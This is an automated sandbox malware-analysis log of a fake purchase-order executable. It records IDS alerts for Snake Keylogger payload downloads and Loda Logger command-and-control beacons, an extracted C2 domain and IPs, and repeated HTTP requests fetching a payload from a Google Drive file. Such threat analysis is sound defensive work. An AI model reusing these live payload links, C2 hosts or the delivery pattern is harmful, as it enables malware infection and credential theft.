                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49812 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49815 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49814 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49824 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49828 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49830 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49839 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49840 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49849 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49848 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49857 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49858 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49867 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49868 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49873 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49874 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49876 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49875 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49889 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49890 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49898 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49899 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49918 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49919 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49938 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49937 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49954 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49955 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49973 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49974 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49985 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49986 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49988 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49987 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50005 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50004 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50013 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50015 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50016 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50014 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50029 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50030 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50050 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50049 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50061 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50062 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50079 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50080 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50091 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50089 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50090 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50092 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50110 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50111 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50119 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50120 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50135 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50134 version: TLS 1.2
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                Source: New PO - Supplier 0202AW-PER2.exeBinary or memory string: [autorun]
                                Source: New PO - Supplier 0202AW-PER2.exeBinary or memory string: [autorun]
                                Source: New PO - Supplier 0202AW-PER2.exeBinary or memory string: autorun.inf
                                Source: ~$cache1.2.drBinary or memory string: [autorun]
                                Source: ~$cache1.2.drBinary or memory string: [autorun]
                                Source: ~$cache1.2.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBDD92 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00EBDD92
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF2044
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF219F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EF24A9
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00EE6B3F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00EE6E4A
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EEF350
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00EEFDD2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEFD47 FindFirstFileW,FindClose,1_2_00EEFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C2044
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C219F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000C24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_000B6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_000B6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000BF350
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BFD47 FindFirstFileW,FindClose,9_2_000BFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0008DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_000BFDD2
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: excel.exeMemory has grown: Private usage: 2MB later: 66MB

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49739 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:49776 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49776 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49747 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49801 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.4:49801
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49735 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49734 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49741 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49760 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49761 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49766 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49796 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49785 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49797 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49784 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49765 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49831 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49840 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49813 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49858 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49868 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49808 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49781 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49809 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49876 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49890 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49823 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49889 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49829 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49857 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49839 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49873 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49742 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49814 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49849 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49848 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49867 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49780 -> 142.250.181.14:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49824 -> 142.250.181.14:443
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00EF550C
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
